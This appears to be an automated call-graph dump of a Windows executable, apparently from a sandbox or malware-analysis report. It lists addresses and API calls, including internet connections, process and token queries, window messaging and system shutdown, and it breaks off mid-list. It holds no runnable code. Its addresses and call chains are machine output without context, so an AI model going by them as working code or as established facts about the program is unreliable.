111456a0 18 API calls std::_Mutex::_Mutex 72549->72589 72554 1110f360 SetEvent 72553->72554 72555 1110f349 72553->72555 72554->72457 72611 11029450 265 API calls 2 library calls 72555->72611 72558->72459 72559->72461 72561 1110f6d7 EnterCriticalSection 72560->72561 72562 1110f6ce GetCurrentThreadId 72560->72562 72563 1110f6ee ___DllMainCRTStartup 72561->72563 72562->72561 72564 1110f6f5 LeaveCriticalSection 72563->72564 72565 1110f708 LeaveCriticalSection 72563->72565 72564->72538 72565->72538 72573 1115f550 72566->72573 72569 11102b81 CreateWindowExA 72569->72546 72570 11102b17 std::_Mutex::_Mutex 72571 11102b50 GetStockObject RegisterClassA 72570->72571 72571->72569 72572 11102b7a 72571->72572 72572->72569 72576 1115e380 GlobalAddAtomA 72573->72576 72577 1115e3b5 GetLastError wsprintfA 72576->72577 72578 1115e407 GlobalAddAtomA GlobalAddAtomA 72576->72578 72585 11029450 265 API calls 2 library calls 72577->72585 72579 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72578->72579 72581 11102ae1 GlobalAddAtomA 72579->72581 72581->72569 72581->72570 72590 111457a0 72586->72590 72588 11102ca5 CloseDesktop 72588->72450 72589->72548 72591 111457c4 72590->72591 72592 111457c9 72590->72592 72610 111456a0 18 API calls std::_Mutex::_Mutex 72591->72610 72594 11145832 72592->72594 72595 111457d2 72592->72595 72596 111458de 72594->72596 72597 1114583f wsprintfA 72594->72597 72602 111457e0 72595->72602 72603 11145809 72595->72603 72599 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72596->72599 72598 11145862 72597->72598 72598->72598 72600 11145869 wvsprintfA 72598->72600 72601 111458ea 72599->72601 72609 11145884 72600->72609 72601->72588 72606 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72602->72606 72604 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72603->72604 72605 1114582e 72604->72605 72605->72588 72607 11145805 72606->72607 72607->72588 72608 111458d1 OutputDebugStringA 72608->72596 72609->72608 72609->72609 72610->72592 72613 110b7a28 std::_Mutex::_Mutex 72612->72613 72613->72464 72614->72466 72615->72466 72616->72470 72618 1110f420 std::_Mutex::_Mutex 265 API calls 72617->72618 72619 11110101 72618->72619 72620 1110f420 std::_Mutex::_Mutex 265 API calls 72619->72620 72625 11110123 GetCurrentThreadId InitializeCriticalSection 72619->72625 72622 1111011c 72620->72622 72622->72625 72648 1116219a 66 API calls std::exception::_Copy_str 72622->72648 72623 11110190 EnterCriticalSection 72626 1111024a LeaveCriticalSection 72623->72626 72627 111101be CreateEventA 72623->72627 72624 11110183 InitializeCriticalSection 72624->72623 72625->72623 72625->72624 72626->72482 72629 111101d1 72627->72629 72630 111101e8 72627->72630 72650 11029450 265 API calls 2 library calls 72629->72650 72631 1110f420 std::_Mutex::_Mutex 265 API calls 72630->72631 72634 111101ef 72631->72634 72632 1111013f 72649 111625f1 RaiseException 72632->72649 72637 1111020c 72634->72637 72638 111100d0 418 API calls 72634->72638 72639 1110f420 std::_Mutex::_Mutex 265 API calls 72637->72639 72638->72637 72640 1111021c 72639->72640 72641 1111022d 72640->72641 72642 1110f520 3 API calls 72640->72642 72643 1110f2b0 418 API calls 72641->72643 72642->72641 72644 11110245 72643->72644 72644->72626 72645->72497 72646->72494 72647->72495 72648->72632 72649->72625 72751 110d1480 72651->72751 72654 110d159b 72656 110d15b5 72654->72656 72657 110d1598 72654->72657 72655 110d1584 72765 11029450 265 API calls 2 library calls 72655->72765 72656->72525 72657->72654 72766 11029450 265 API calls 2 library calls 72657->72766 72662 110d0724 72661->72662 72824 11163cf8 72662->72824 72665 110d0450 265 API calls 72666 110d0753 72665->72666 72832 110cfe70 72666->72832 72669 110d077c 72669->72525 72670 110d0765 72844 11029450 265 API calls 2 library calls 72670->72844 72718 11029621 std::ios_base::_Ios_base_dtor 72673->72718 72674 11029653 GetProcAddress 72678 11029671 SetLastError 72674->72678 72674->72718 72675 11162b51 66 API calls _malloc 72675->72718 72676 11029748 InternetOpenA 72676->72718 72677 1102972f GetProcAddress 72677->72676 72679 11029779 SetLastError 72677->72679 72678->72718 72679->72718 72680 110296a5 GetProcAddress 72682 11029762 SetLastError 72680->72682 72680->72718 72681 11162be5 66 API calls _free 72681->72718 72683 110296d2 GetLastError 72682->72683 72683->72718 72684 11142290 std::_Mutex::_Mutex 265 API calls 72684->72718 72685 110296f5 GetProcAddress 72686 1102976f SetLastError 72685->72686 72685->72718 72686->72718 72687 11029a40 72691 11029b76 GetProcAddress 72687->72691 72692 11029a31 72687->72692 72688 11029bb0 72688->72532 72689 11029ba9 FreeLibrary 72689->72688 72690 11029a57 GetProcAddress 72693 11029b2e SetLastError 72690->72693 72714 11029a1a std::ios_base::_Ios_base_dtor 72690->72714 72691->72692 72694 11029b97 SetLastError 72691->72694 72692->72688 72692->72689 72715 11029b36 std::ios_base::_Ios_base_dtor 72693->72715 72694->72692 72695 11081a70 IsDBCSLeadByte 72695->72718 72697 11029b5b 72878 110278a0 GetProcAddress SetLastError 72697->72878 72699 1102982b GetProcAddress 72700 1102983e InternetConnectA 72699->72700 72703 11029881 SetLastError 72699->72703 72700->72718 72702 110297ff GetProcAddress 72705 1102981c SetLastError 72702->72705 72702->72718 72703->72718 72704 11029b6a 72704->72687 72705->72718 72707 11029864 GetProcAddress 72709 11029891 SetLastError 72707->72709 72707->72718 72708 110298a3 GetProcAddress 72710 110298d6 SetLastError 72708->72710 72708->72718 72709->72718 72710->72718 72711 110d1090 268 API calls 72712 11029a80 std::ios_base::_Ios_base_dtor 72711->72712 72712->72711 72712->72714 72712->72715 72869 1110f4a0 72712->72869 72876 11027850 GetProcAddress SetLastError 72712->72876 72713 110298f1 GetProcAddress 72716 11029918 SetLastError 72713->72716 72713->72718 72714->72687 72714->72690 72714->72692 72714->72712 72877 110278a0 GetProcAddress SetLastError 72715->72877 72717 11029922 GetLastError 72716->72717 72717->72718 72719 1102993d GetProcAddress 72717->72719 72718->72674 72718->72675 72718->72676 72718->72677 72718->72680 72718->72681 72718->72683 72718->72684 72718->72685 72718->72695 72718->72699 72718->72700 72718->72702 72718->72707 72718->72708 72718->72713 72718->72714 72718->72717 72721 11029975 GetLastError 72718->72721 72722 1102998c GetDesktopWindow 72718->72722 72719->72718 72720 1102996d SetLastError 72719->72720 72720->72721 72721->72718 72721->72722 72722->72718 72723 1102999a GetProcAddress 72722->72723 72723->72718 72724 110299d6 SetLastError 72723->72724 72724->72718 72725->72525 72727 1114229a 72726->72727 72728 1114229c 72726->72728 72727->72532 72729 1110f4a0 std::_Mutex::_Mutex 265 API calls 72728->72729 72730 111422c2 72729->72730 72731 111422cb _strncpy 72730->72731 72732 111422e9 72730->72732 72731->72532 72880 11029450 265 API calls 2 library calls 72732->72880 72735->72532 72881 110d05c0 72736->72881 72739 110d07e9 72886 11162be5 72739->72886 72740 110d07d2 72885 11029450 265 API calls 2 library calls 72740->72885 72743 110d07f2 72743->72508 72745->72510 72746->72513 72752 110d148c 72751->72752 72753 110d14a7 72752->72753 72754 110d1490 72752->72754 72767 110d0190 72753->72767 72796 11029450 265 API calls 2 library calls 72754->72796 72761 110d14de 72761->72654 72761->72655 72762 110d14c7 72797 11029450 265 API calls 2 library calls 72762->72797 72768 110d0199 72767->72768 72769 110d019d 72768->72769 72770 110d01b4 72768->72770 72798 11029450 265 API calls 2 library calls 72769->72798 72772 110d01b1 72770->72772 72773 110d01e8 72770->72773 72772->72770 72799 11029450 265 API calls 2 library calls 72772->72799 72775 110d01e5 72773->72775 72776 110d0206 72773->72776 72775->72773 72800 11029450 265 API calls 2 library calls 72775->72800 72779 110d1090 72776->72779 72780 110d109e 72779->72780 72781 110d10b9 72780->72781 72782 110d10a2 72780->72782 72785 110d10b6 72781->72785 72786 110d10ec 72781->72786 72801 11029450 265 API calls 2 library calls 72782->72801 72784 110d1160 72784->72761 72784->72762 72785->72781 72802 11029450 265 API calls 2 library calls 72785->72802 72786->72784 72786->72786 72803 110d09e0 72786->72803 72792 110d111f _memmove 72792->72784 72793 110d1149 72792->72793 72815 11029450 265 API calls 2 library calls 72793->72815 72804 110d09ed 72803->72804 72805 110d0a08 72804->72805 72806 110d09f1 72804->72806 72808 110d0a05 72805->72808 72809 110d0a26 72805->72809 72821 11029450 265 API calls 2 library calls 72806->72821 72808->72805 72822 11029450 265 API calls 2 library calls 72808->72822 72816 110d0450 72809->72816 72814 110d0920 268 API calls 2 library calls 72814->72792 72817 110d045b 72816->72817 72818 110d0472 72816->72818 72823 11029450 265 API calls 2 library calls 72817->72823 72818->72792 72818->72814 72825 11163d09 _strlen 72824->72825 72828 110d072f 72824->72828 72826 11162b51 _malloc 66 API calls 72825->72826 72827 11163d1c 72826->72827 72827->72828 72845 1116be9f 72827->72845 72828->72665 72833 110cfe7d 72832->72833 72834 110cfe98 72833->72834 72835 110cfe81 72833->72835 72837 110cfe95 72834->72837 72838 110cfeb6 72834->72838 72866 11029450 265 API calls 2 library calls 72835->72866 72837->72834 72867 11029450 265 API calls 2 library calls 72837->72867 72840 110cfeb3 72838->72840 72843 110cfed9 72838->72843 72840->72838 72868 11029450 265 API calls 2 library calls 72840->72868 72843->72669 72843->72670 72846 1116bead 72845->72846 72849 1116beb4 72845->72849 72846->72849 72851 1116bed2 72846->72851 72848 1116beb9 72858 1116df04 11 API calls _memcpy_s 72848->72858 72857 111692ef 66 API calls __getptd_noexit 72849->72857 72852 11163d2e 72851->72852 72859 111692ef 66 API calls __getptd_noexit 72851->72859 72852->72828 72854 1116deb2 72852->72854 72860 1116dd89 72854->72860 72857->72848 72858->72852 72859->72848 72861 1116dda8 _memset __call_reportfault 72860->72861 72862 1116ddc6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 72861->72862 72865 1116de94 __call_reportfault 72862->72865 72863 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72864 1116deb0 GetCurrentProcess TerminateProcess 72863->72864 72864->72828 72865->72863 72870 11162b51 _malloc 66 API calls 72869->72870 72871 1110f4ae 72870->72871 72872 1110f4b7 72871->72872 72874 1110f4ce _memset 72871->72874 72879 11029450 265 API calls 2 library calls 72872->72879 72874->72712 72876->72712 72877->72697 72878->72704 72882 110d05d9 72881->72882 72883 110d05ec 72881->72883 72882->72883 72884 110d0450 265 API calls 72882->72884 72883->72739 72883->72740 72884->72883 72887 11162bf0 HeapFree 72886->72887 72891 11162c19 __dosmaperr 72886->72891 72888 11162c05 72887->72888 72887->72891 72892 111692ef 66 API calls __getptd_noexit 72888->72892 72890 11162c0b GetLastError 72890->72891 72891->72743 72892->72890 72894 1109e930 GetTokenInformation 72893->72894 72899 1109e9c6 72893->72899 72896 1109e952 __crtCompareStringA_stat 72894->72896 72895 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72897 1109e9d8 72895->72897 72898 1109e958 GetTokenInformation 72896->72898 72896->72899 72897->72357 72898->72899 72900 1109e96a 72898->72900 72899->72895 72901 1109e99f EqualSid 72900->72901 72902 1109e973 AllocateAndInitializeSid 72900->72902 72901->72899 72903 1109e9ad 72901->72903 72902->72899 72902->72901 72904 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 72903->72904 72905 1109e9c2 72904->72905 72905->72357 72907 1114302a 72906->72907 72907->72374 72909 11162dd1 72908->72909 72927 1116364b 72909->72927 72912 11163a2d 72913 11163a4d 72912->72913 72914 11163a3b 72912->72914 73062 111639dc 79 API calls 2 library calls 72913->73062 72914->72382 72916 11163a57 72916->72382 72918 11081c6d 72917->72918 72919 11081c72 72917->72919 73063 11081990 IsDBCSLeadByte 72918->73063 72921 11081c7b 72919->72921 72925 11081c93 72919->72925 73064 11163784 85 API calls 3 library calls 72921->73064 72923 11081c8c 72923->72373 72924 11165797 85 API calls std::_Mutex::_Mutex 72924->72925 72925->72924 72926 11081c99 72925->72926 72926->72373 72928 11163664 72927->72928 72931 11163420 72928->72931 72943 11163399 72931->72943 72933 11163444 72951 111692ef 66 API calls __getptd_noexit 72933->72951 72936 11163449 72952 1116df04 11 API calls _memcpy_s 72936->72952 72939 1116347a 72941 111634c1 72939->72941 72953 11170c05 79 API calls 3 library calls 72939->72953 72942 1114519e 72941->72942 72954 111692ef 66 API calls __getptd_noexit 72941->72954 72942->72912 72944 111633ac 72943->72944 72950 111633f9 72943->72950 72955 1116b7b5 72944->72955 72947 111633d9 72947->72950 72975 11170744 68 API calls 6 library calls 72947->72975 72950->72933 72950->72939 72951->72936 72952->72942 72953->72939 72954->72942 72976 1116b73c GetLastError 72955->72976 72957 1116b7bd 72959 111633b1 72957->72959 72990 1116d7aa 66 API calls 3 library calls 72957->72990 72959->72947 72960 111704a8 72959->72960 72961 111704b4 __alloc_osfhnd 72960->72961 72962 1116b7b5 __getptd 66 API calls 72961->72962 72963 111704b9 72962->72963 72964 111704e7 72963->72964 72965 111704cb 72963->72965 73013 1117373c 72964->73013 72968 1116b7b5 __getptd 66 API calls 72965->72968 72967 111704ee 73020 1117045b 74 API calls 3 library calls 72967->73020 72972 111704d0 72968->72972 72970 11170502 73021 11170515 LeaveCriticalSection _doexit 72970->73021 72973 111704de __alloc_osfhnd 72972->72973 73012 1116d7aa 66 API calls 3 library calls 72972->73012 72973->72947 72975->72950 72991 1116b5fa TlsGetValue 72976->72991 72979 1116b7a9 SetLastError 72979->72957 72982 1116b76f DecodePointer 72983 1116b784 72982->72983 72984 1116b7a0 72983->72984 72985 1116b788 72983->72985 72987 11162be5 _free 62 API calls 72984->72987 73000 1116b688 66 API calls 4 library calls 72985->73000 72988 1116b7a6 72987->72988 72988->72979 72989 1116b790 GetCurrentThreadId 72989->72979 72992 1116b60f DecodePointer TlsSetValue 72991->72992 72993 1116b62a 72991->72993 72992->72993 72993->72979 72994 11169dbe 72993->72994 72997 11169dc7 72994->72997 72996 11169e04 72996->72979 72996->72982 72997->72996 72998 11169de5 Sleep 72997->72998 73001 11170166 72997->73001 72999 11169dfa 72998->72999 72999->72996 72999->72997 73000->72989 73002 11170172 73001->73002 73007 1117018d 73001->73007 73003 1117017e 73002->73003 73002->73007 73010 111692ef 66 API calls __getptd_noexit 73003->73010 73004 111701a0 RtlAllocateHeap 73006 111701c7 73004->73006 73004->73007 73006->72997 73007->73004 73007->73006 73011 1116d4a8 DecodePointer 73007->73011 73008 11170183 73008->72997 73010->73008 73011->73007 73014 11173764 EnterCriticalSection 73013->73014 73015 11173751 73013->73015 73014->72967 73022 1117367a 73015->73022 73017 11173757 73017->73014 73049 1116d7aa 66 API calls 3 library calls 73017->73049 73020->72970 73021->72972 73023 11173686 __alloc_osfhnd 73022->73023 73024 11173696 73023->73024 73025 111736ae 73023->73025 73050 1116d99d 66 API calls 2 library calls 73024->73050 73033 111736bc __alloc_osfhnd 73025->73033 73053 11169d79 73025->73053 73027 1117369b 73051 1116d7ee 66 API calls 7 library calls 73027->73051 73031 111736ce 73059 111692ef 66 API calls __getptd_noexit 73031->73059 73032 111736dd 73036 1117373c __lock 65 API calls 73032->73036 73033->73017 73034 111736a2 73052 1116d52d GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 73034->73052 73038 111736e4 73036->73038 73040 11173717 73038->73040 73041 111736ec InitializeCriticalSectionAndSpinCount 73038->73041 73044 11162be5 _free 65 API calls 73040->73044 73042 11173708 73041->73042 73043 111736fc 73041->73043 73061 11173733 LeaveCriticalSection _doexit 73042->73061 73045 11162be5 _free 65 API calls 73043->73045 73044->73042 73047 11173702 73045->73047 73060 111692ef 66 API calls __getptd_noexit 73047->73060 73050->73027 73051->73034 73055 11169d82 73053->73055 73054 11162b51 _malloc 65 API calls 73054->73055 73055->73054 73056 11169db8 73055->73056 73057 11169d99 Sleep 73055->73057 73056->73031 73056->73032 73058 11169dae 73057->73058 73058->73055 73058->73056 73059->73033 73060->73042 73061->73033 73062->72916 73063->72919 73064->72923 73065->72399 73066 11115b70 73084 11145320 73066->73084 73069 11115bb5 73070 11115bc4 CoInitialize CoCreateInstance 73069->73070 73071 11115b98 73069->73071 73073 11115bf4 LoadLibraryA 73070->73073 73076 11115be9 73070->73076 73074 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73071->73074 73072 111450a0 std::_Mutex::_Mutex 90 API calls 73072->73069 73075 11115c10 GetProcAddress 73073->73075 73073->73076 73077 11115ba6 73074->73077 73078 11115c20 SHGetSettings 73075->73078 73079 11115c34 FreeLibrary 73075->73079 73080 11115cd1 CoUninitialize 73076->73080 73081 11115cd7 73076->73081 73078->73079 73079->73076 73080->73081 73082 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73081->73082 73083 11115ce6 73082->73083 73085 111450a0 std::_Mutex::_Mutex 90 API calls 73084->73085 73086 11115b8e 73085->73086 73086->73069 73086->73071 73086->73072 73087 11025d00 73088 11025d0e GetProcAddress 73087->73088 73089 11025d1f 73087->73089 73088->73089 73090 11025d38 73089->73090 73091 11025d2c K32GetProcessImageFileNameA 73089->73091 73093 11025d3e GetProcAddress 73090->73093 73094 11025d4f 73090->73094 73091->73090 73092 11025d71 73091->73092 73093->73094 73095 11025d56 73094->73095 73096 11025d67 SetLastError 73094->73096 73096->73092 73097 11173a35 73098 1116b7b5 __getptd 66 API calls 73097->73098 73099 11173a52 _LcidFromHexString 73098->73099 73100 11173a5f GetLocaleInfoA 73099->73100 73101 11173a86 73100->73101 73102 11173a92 73100->73102 73104 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73101->73104 73120 111646ce 85 API calls 3 library calls 73102->73120 73106 11173c02 73104->73106 73105 11173a9e 73107 11173aa8 GetLocaleInfoA 73105->73107 73113 11173ad8 _CountryEnumProc@4 _strlen 73105->73113 73107->73101 73108 11173ac7 73107->73108 73121 111646ce 85 API calls 3 library calls 73108->73121 73109 11173b4b GetLocaleInfoA 73109->73101 73111 11173b6e 73109->73111 73123 111646ce 85 API calls 3 library calls 73111->73123 73113->73101 73113->73109 73114 11173b79 73114->73101 73118 11173b81 _strlen 73114->73118 73124 111646ce 85 API calls 3 library calls 73114->73124 73115 11173ad2 73115->73113 73122 11163784 85 API calls 3 library calls 73115->73122 73118->73101 73125 111739da GetLocaleInfoW _GetPrimaryLen _strlen 73118->73125 73120->73105 73121->73115 73122->73113 73123->73114 73124->73118 73125->73101 73126 1102e640 73127 1102e683 73126->73127 73128 1110f420 std::_Mutex::_Mutex 265 API calls 73127->73128 73129 1102e68a 73128->73129 73131 1102e6aa 73129->73131 74196 11142a60 73129->74196 73525 11142bb0 73131->73525 73134 1102e701 73137 11142bb0 86 API calls 73134->73137 73136 1102e6e6 73138 11081bb0 86 API calls 73136->73138 73139 1102e72a 73137->73139 73138->73134 73140 11162de7 std::_Mutex::_Mutex 79 API calls 73139->73140 73144 1102e737 73139->73144 73140->73144 73141 1102e766 73142 1102e7e5 CreateEventA 73141->73142 73143 1102e7bf GetSystemMetrics 73141->73143 73149 1102e805 73142->73149 73150 1102e819 73142->73150 73143->73142 73145 1102e7ce 73143->73145 73144->73141 73147 111450a0 std::_Mutex::_Mutex 90 API calls 73144->73147 73148 11146450 std::_Mutex::_Mutex 21 API calls 73145->73148 73147->73141 73151 1102e7d8 73148->73151 74358 11029450 265 API calls 2 library calls 73149->74358 73154 1110f420 std::_Mutex::_Mutex 265 API calls 73150->73154 74214 1102d330 73151->74214 73155 1102e820 73154->73155 73156 1102e840 73155->73156 73157 111100d0 424 API calls 73155->73157 73158 1110f420 std::_Mutex::_Mutex 265 API calls 73156->73158 73157->73156 73159 1102e854 73158->73159 73160 111100d0 424 API calls 73159->73160 73161 1102e874 73159->73161 73160->73161 73162 1110f420 std::_Mutex::_Mutex 265 API calls 73161->73162 73163 1102e8f3 73162->73163 73164 1102e923 73163->73164 74359 11060f70 301 API calls std::_Mutex::_Mutex 73163->74359 73166 1110f420 std::_Mutex::_Mutex 265 API calls 73164->73166 73167 1102e93d 73166->73167 73168 1102e962 FindWindowA 73167->73168 74360 11060be0 293 API calls std::_Mutex::_Mutex 73167->74360 73171 1102eab7 73168->73171 73172 1102e99b 73168->73172 73531 110613d0 73171->73531 73172->73171 73176 1102e9b3 GetWindowThreadProcessId 73172->73176 73175 110613d0 268 API calls 73177 1102ead5 73175->73177 73178 11146450 std::_Mutex::_Mutex 21 API calls 73176->73178 73179 110613d0 268 API calls 73177->73179 73180 1102e9d9 OpenProcess 73178->73180 73181 1102eae1 73179->73181 73180->73171 73182 1102e9f9 73180->73182 73184 1102eaf8 73181->73184 73185 1102eaef 73181->73185 74361 11094b30 105 API calls 73182->74361 73538 11145910 73184->73538 74362 11027d60 119 API calls 2 library calls 73185->74362 73186 1102ea18 73188 11146450 std::_Mutex::_Mutex 21 API calls 73186->73188 73191 1102ea2c 73188->73191 73189 1102eaf4 73189->73184 73193 1102ea6b CloseHandle FindWindowA 73191->73193 73194 11146450 std::_Mutex::_Mutex 21 API calls 73191->73194 73192 1102eb07 73553 11144dc0 ExpandEnvironmentStringsA 73192->73553 73195 1102ea93 GetWindowThreadProcessId 73193->73195 73196 1102eaa7 73193->73196 73199 1102ea3e SendMessageA WaitForSingleObject 73194->73199 73195->73196 73200 11146450 std::_Mutex::_Mutex 21 API calls 73196->73200 73199->73193 73202 1102ea5e 73199->73202 73203 1102eab4 73200->73203 73205 11146450 std::_Mutex::_Mutex 21 API calls 73202->73205 73203->73171 73204 1102eb2a 73206 1102ec01 73204->73206 73577 11062d60 73204->73577 73207 1102ea68 73205->73207 73592 110274c0 73206->73592 73207->73193 74423 11142ac0 73525->74423 73527 11142ac0 IsDBCSLeadByte 73529 11142bc5 73527->73529 73528 11165797 85 API calls std::_Mutex::_Mutex 73528->73529 73529->73527 73529->73528 73530 1102e6d4 73529->73530 73530->73134 74204 11081bb0 73530->74204 73532 11061446 73531->73532 73537 110613f7 73531->73537 73533 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73532->73533 73534 1102eac9 73533->73534 73534->73175 73535 11081bb0 86 API calls 73535->73537 73537->73532 73537->73535 74435 110612f0 268 API calls 4 library calls 73537->74435 74436 11144bd0 73538->74436 73541 11144bd0 std::_Mutex::_Mutex 265 API calls 73542 11145947 wsprintfA 73541->73542 73543 11143230 std::_Mutex::_Mutex 8 API calls 73542->73543 73544 11145964 73543->73544 73545 11145990 73544->73545 73547 11143230 std::_Mutex::_Mutex 8 API calls 73544->73547 73546 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73545->73546 73548 1114599c 73546->73548 73549 11145979 73547->73549 73548->73192 73549->73545 73550 11145980 73549->73550 73551 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73550->73551 73552 1114598c 73551->73552 73552->73192 73554 11144df7 73553->73554 73555 11144e14 std::_Mutex::_Mutex 73554->73555 73556 11144e2e 73554->73556 73565 11144e04 73554->73565 73558 11144e25 GetModuleFileNameA 73555->73558 73557 11144bd0 std::_Mutex::_Mutex 265 API calls 73556->73557 73559 11144e34 73557->73559 73558->73559 73563 11081b40 std::_Mutex::_Mutex IsDBCSLeadByte 73559->73563 73560 11142290 std::_Mutex::_Mutex 265 API calls 73561 11144e88 73560->73561 73562 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73561->73562 73564 1102eb18 73562->73564 73563->73565 73566 11143230 73564->73566 73565->73560 73567 11143251 CreateFileA 73566->73567 73569 111432ee CloseHandle 73567->73569 73570 111432ce 73567->73570 73573 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73569->73573 73571 111432d2 CreateFileA 73570->73571 73572 1114330b 73570->73572 73571->73569 73571->73572 73575 11161d01 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 73572->73575 73574 11143307 73573->73574 73574->73204 73576 1114331a 73575->73576 73576->73204 73578 1105dd10 79 API calls 73577->73578 73579 11062d88 73578->73579 74485 11061c90 73579->74485 75253 11060f40 73592->75253 74197 11142aa8 74196->74197 74200 11142a6e 74196->74200 74198 11142290 std::_Mutex::_Mutex 265 API calls 74197->74198 74199 11142ab0 74198->74199 74199->73131 74200->74197 74201 11142a92 74200->74201 76376 11142310 267 API calls std::_Mutex::_Mutex 74201->76376 74203 11142a98 74203->73131 74205 11081bbd 74204->74205 74206 11081bc2 74204->74206 76377 11081990 IsDBCSLeadByte 74205->76377 74208 11081bcb 74206->74208 74213 11081bdf 74206->74213 76378 111646ce 85 API calls 3 library calls 74208->76378 74210 11081bd8 74210->73136 74211 11081c43 74211->73136 74212 11165797 85 API calls std::_Mutex::_Mutex 74212->74213 74213->74211 74213->74212 74215 11146450 std::_Mutex::_Mutex 21 API calls 74214->74215 74216 1102d36c 74215->74216 74217 11145320 std::_Mutex::_Mutex 90 API calls 74216->74217 74218 1102d374 74217->74218 74219 1102d3a9 GetCurrentProcess SetPriorityClass 74218->74219 74220 1102d37d InterlockedIncrement 74218->74220 74222 1102d3dd 74219->74222 74220->74219 74221 1102d38c 74220->74221 74223 11146450 std::_Mutex::_Mutex 21 API calls 74221->74223 74224 1102d3e6 SetEvent 74222->74224 74229 1102d3ed 74222->74229 74225 1102d396 74223->74225 74224->74229 74226 1102d3a0 Sleep 74225->74226 74226->74226 74227 1102d424 74228 1102d452 74227->74228 76398 1109f1d0 273 API calls std::_Mutex::_Mutex 74227->76398 76399 11028e70 583 API calls std::_Mutex::_Mutex 74228->76399 74229->74227 76396 11029370 279 API calls 2 library calls 74229->76396 74233 1102d40d 76397 110ff6c0 278 API calls 2 library calls 74233->76397 74234 1102d463 76379 11028090 SetEvent 74234->76379 74237 1102d468 74238 1102d472 74237->74238 74239 1102d47d 74237->74239 76400 110ec980 453 API calls 74238->76400 74241 1102d49a 74239->74241 74242 1102d49f 74239->74242 76401 110594a0 SetEvent 74241->76401 74244 1102d4a7 74242->74244 74245 1102d4de 74242->74245 74244->74245 74251 1102d4d3 Sleep 74244->74251 74246 11146450 std::_Mutex::_Mutex 21 API calls 74245->74246 74247 1102d4e8 74246->74247 74248 1102d4f5 74247->74248 74249 1102d526 74247->74249 74248->74247 74250 1105dd10 79 API calls 74248->74250 74253 1102d58a 74249->74253 74254 1102d53f 74249->74254 74259 1102d523 74249->74259 74252 1102d518 74250->74252 74251->74245 74252->74249 76402 1102cff0 294 API calls std::_Mutex::_Mutex 74252->76402 76405 11026f20 6 API calls std::ios_base::_Ios_base_dtor 74253->76405 76380 110affa0 74254->76380 74259->74249 74259->74253 74260 1102d590 74264 1102d5af PostThreadMessageA 74260->74264 74271 1102d5cb 74260->74271 74262 1102d613 74265 1102d62d 74262->74265 74275 11146450 std::_Mutex::_Mutex 21 API calls 74262->74275 76406 1110f3a0 WaitForSingleObject 74264->76406 74268 1102d66b 74265->74268 76409 11105420 26 API calls std::_Mutex::_Mutex 74265->76409 74266 1102d5f0 76408 11059400 DeleteCriticalSection CloseHandle 74266->76408 74274 1102d681 74268->74274 74280 11075d10 402 API calls 74268->74280 74271->74262 74271->74266 76407 1110f3a0 WaitForSingleObject 74271->76407 74272 1102d56a 74357 1102d57d std::ios_base::_Ios_base_dtor 74272->74357 76404 111352b0 299 API calls 5 library calls 74272->76404 74281 11146450 std::_Mutex::_Mutex 21 API calls 74274->74281 74275->74265 74278 1102d661 76410 11107b50 661 API calls std::_Mutex::_Mutex 74278->76410 74280->74274 74284 1102d68b 74281->74284 74283 1102d889 74287 1102d8a0 74283->74287 76429 1100d200 wsprintfA 74283->76429 74288 1113cc30 311 API calls 74284->74288 74285 1102d666 76411 11105ac0 347 API calls std::_Mutex::_Mutex 74285->76411 74297 1102d8c7 GetModuleFileNameA GetFileAttributesA 74287->74297 74308 1102d9e3 74287->74308 74292 1102d690 74288->74292 74294 11146450 std::_Mutex::_Mutex 21 API calls 74292->74294 74293 1102d895 74296 11146450 std::_Mutex::_Mutex 21 API calls 74293->74296 74295 1102d69a 74294->74295 74305 1102d6ae std::ios_base::_Ios_base_dtor 74295->74305 76412 1109d920 WaitForSingleObject SetEvent WaitForSingleObject CloseHandle 74295->76412 74296->74287 74299 1102d8ef 74297->74299 74297->74308 74298 11146450 std::_Mutex::_Mutex 21 API calls 74302 1102da92 74298->74302 74300 1110f420 std::_Mutex::_Mutex 265 API calls 74299->74300 74304 1102d8f6 74300->74304 76432 11146410 FreeLibrary 74302->76432 74303 11146450 std::_Mutex::_Mutex 21 API calls 74307 1102d6c1 74303->74307 74310 11142a60 267 API calls 74304->74310 74321 1102d918 74304->74321 74305->74303 74316 1102d6d5 std::ios_base::_Ios_base_dtor 74307->74316 76413 1110e5c0 DeleteCriticalSection std::ios_base::_Ios_base_dtor 74307->76413 74308->74298 74309 1102da9a 74311 1102dad6 74309->74311 74314 1102dac4 ExitWindowsEx 74309->74314 74315 1102dab4 ExitWindowsEx Sleep 74309->74315 74310->74321 74317 1102dae6 74311->74317 74318 1102dadb Sleep 74311->74318 74313 1102d74f 74326 1102d760 std::ios_base::_Ios_base_dtor 74313->74326 76416 1110fc70 278 API calls 2 library calls 74313->76416 74314->74311 74315->74314 74316->74313 76414 1110fc10 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Ios_base_dtor 74316->76414 74319 11146450 std::_Mutex::_Mutex 21 API calls 74317->74319 74318->74317 74322 1102daf0 ExitProcess 74319->74322 74324 11142bb0 86 API calls 74321->74324 74328 1102d93d 74324->74328 74347 